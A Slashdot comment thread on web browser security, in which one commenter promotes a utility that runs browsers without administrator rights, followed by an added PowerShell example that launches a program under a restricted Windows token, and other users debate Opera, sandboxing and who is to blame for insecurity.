Largely yes and largely ignorance (mitigation) (4, Interesting)

betelgeuse68 (230611) | more than 5 years ago | (#25851661)

Exploits for specific document types make compromising people's machines an issue. However, what 99.9% of people that revel in schadenfreude with IE's woes miss or fail to understand (yeah including many people on Slashdot) is that most Windows XP users (which are most Windows users, Vista is only 20%) run as "root"!!! ("administrator" in the Windows vernacular)

I wrote a utility called RemoveAdmin available on Download.com that leverages an API in Windows (CreateRestrictedToken) that strips administrative rights:

http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=mncol&cdlPid=10835515

The installer will create shortcuts for IE and Firefox but if you look carefully it's really a program with the browser .EXE passed as an argument.

Which means you can strip administrative rights on anything you run... in fact that's exactly what I do. I don't run *anything* that talks on the Net without this.

This means if you stumble across rigged .PDFs, Word documents, etc., etc., you won't suddenly have a keyboard logger installed because ignorant you is running with admin rights.

(Some caveats)

This is version 0.1. What would 1.0 have? A FAQ and user guide for starters. Also, I've seen this version not work in some cases, largely situations where AD is in play (probably because a user has multiple admin credentials).

If you need to run ActiveX controls on a site (poor you if you use IE), just quit IE, go to the site, have the controls installed. Quit IE and re-run IE with the secure link. Likewise this is what you would do before going to WindowsUpdate.

And finally, to convince yourself the utility does something useful, go to any site, "View Source" after you run your browser with the secure link and try to save the resultant .HTML/JavaScript to C:\Windows. You'll find you can't.... since your browser process doesn't have administrative rights (root) and thus any process it launches doesn't either (think of this as a plug-in scenario).

Maybe I'll educate some % of the IT world yet...

Respectfully,
-M
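
The launcher pattern described in the comment above, as an added PowerShell example that is not the RemoveAdmin source: it marks BUILTIN\Administrators deny-only, drops most privileges with DISABLE_MAX_PRIVILEGE, and starts the program passed as an argument under that token. The choice of SID and flag, the `Demo.Native` type name and the notepad default are assumptions; save it as a `.ps1` file to run it.

```powershell
# Added example, not the RemoveAdmin source. Which SIDs/privileges that tool drops is an assumption.
param([string]$Exe = "$env:windir\System32\notepad.exe")   # constructed default target

Add-Type -Namespace Demo -Name Native -MemberDefinition @'
[StructLayout(LayoutKind.Sequential)]
public struct SID_AND_ATTRIBUTES { public IntPtr Sid; public uint Attributes; }
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO {
    public int cb; public string lpReserved, lpDesktop, lpTitle;
    public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
    public short wShowWindow, cbReserved2;
    public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }
[DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool CreateRestrictedToken(IntPtr token, uint flags, uint disableCount,
    SID_AND_ATTRIBUTES[] sidsToDisable, uint deleteCount, IntPtr privsToDelete,
    uint restrictCount, IntPtr sidsToRestrict, out IntPtr newToken);
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool CreateProcessAsUser(IntPtr token, string app, IntPtr cmdLine,
    IntPtr procAttrs, IntPtr threadAttrs, bool inherit, uint flags, IntPtr env, IntPtr cwd,
    ref STARTUPINFO si, out PROCESS_INFORMATION pi);
'@
function Assert-Win32([bool]$ok, [string]$api) {
    if (-not $ok) { throw "$api failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
}
$marshal = [Runtime.InteropServices.Marshal]
# Copy the BUILTIN\Administrators SID (S-1-5-32-544) into unmanaged memory for the API call.
$sid = New-Object Security.Principal.SecurityIdentifier 'S-1-5-32-544'
$bytes = New-Object byte[] $sid.BinaryLength
$sid.GetBinaryForm($bytes, 0)
$sidPtr = $marshal::AllocHGlobal($bytes.Length)
$marshal::Copy($bytes, 0, $sidPtr, $bytes.Length)
$deny = New-Object 'Demo.Native+SID_AND_ATTRIBUTES'
$deny.Sid = $sidPtr
# 0xB = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY on our own process token.
$token = [IntPtr]::Zero; $restricted = [IntPtr]::Zero
Assert-Win32 ([Demo.Native]::OpenProcessToken([Demo.Native]::GetCurrentProcess(), 0xB, [ref]$token)) 'OpenProcessToken'
# 0x1 = DISABLE_MAX_PRIVILEGE; the listed SID becomes a deny-only group in the new token.
Assert-Win32 ([Demo.Native]::CreateRestrictedToken($token, 0x1, 1, [Demo.Native+SID_AND_ATTRIBUTES[]]@($deny),
    0, [IntPtr]::Zero, 0, [IntPtr]::Zero, [ref]$restricted)) 'CreateRestrictedToken'
$si = New-Object 'Demo.Native+STARTUPINFO'; $si.cb = $marshal::SizeOf($si)
$procInfo = New-Object 'Demo.Native+PROCESS_INFORMATION'
Assert-Win32 ([Demo.Native]::CreateProcessAsUser($restricted, $Exe, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero,
    $false, 0, [IntPtr]::Zero, [IntPtr]::Zero, [ref]$si, [ref]$procInfo)) 'CreateProcessAsUser'
"Started PID $($procInfo.dwProcessId) with a restricted token"
```

Launching `cmd.exe` this way and running `whoami /groups` in it shows BUILTIN\Administrators as "Group used for deny only". The child keeps the caller's integrity level; only group membership and privileges are reduced.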

What a joke (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25851751)

Yes it's not their fault that Vista was a fuck up. It's not their fault that it takes half an hour to upgrade to IE7.
It's not as if we should care that the Internet is in a dark age for the last 7 years..

browser security - think Opera (1)

sebt (1229910) | more than 5 years ago | (#25851791)

This is another good reason to use Opera, and one of the key reasons that Opera users and devs have been arguing for a very long time against plugins and extensions.

There can be little doubt that Opera is the safest browser out there, particularly if you like to routinely browse questionable websites; while the safe sandbox of userJS, userCSS and widgets in addition to the plethora of out-of-the-box features means that there's very little need for extensions anyway.

Firefox is a great browser, and much more secure than IE, but since its growth in popularity combines with the number of malicious extensions out there it can no longer be considered to be a completely secure browsing environment.

Don't take my word for it, check out Secunia's own advisories.

sebt :)

sandbox (1)

BigJClark (1226554) | more than 5 years ago | (#25851859)


How about sandboxing the entire thing so that no matter what, with the flip of a switch, no writes to the HD are allowed, period (cookies or otherwise, I don't care to be tracked, and can remember more than one complex password). We could call it something scary, like jail. Or chroot jail.

Think about it, next generation. I've given up on the current one.

ABM (2, Insightful)

YetAnotherBob (988800) | more than 5 years ago | (#25851865)

This is marketing. Blame ABM, Anybody But Microsoft.

Truth is that IE is not the best browser, but is better than it was.

Firefox is also better than it was, so is Opera, so is Webkit (Safari). In the future, I expect Chrome, if it survives, to be better too.

Why is any of this news? It is really just a marketing department's attempt to deflect blame away from where it belongs.

It's really quite simple (1)

vtcodger (957785) | more than 5 years ago | (#25851927)

It's quite simple. You/They/We can define a very simple interface that displays some stuff and allows a few simple user inputs and maybe after a few years of debugging we might have a reliable browser suitable for basic stuff -- including financial data transfers and buying and selling stuff.

Or we can continue to try to do everything in the world in our browsers and then act really surprised when our PC starts relaying 20 thousand spam messages a day or our money and/or data and/or identity ends up in Liechtenstein, Haute Volta, or Inner Mongolia.

It's quite clear to me that we -- all of us -- are going to go with the second option. That's fine. Now can we quit pretending that web insecurity is someone else's fault?
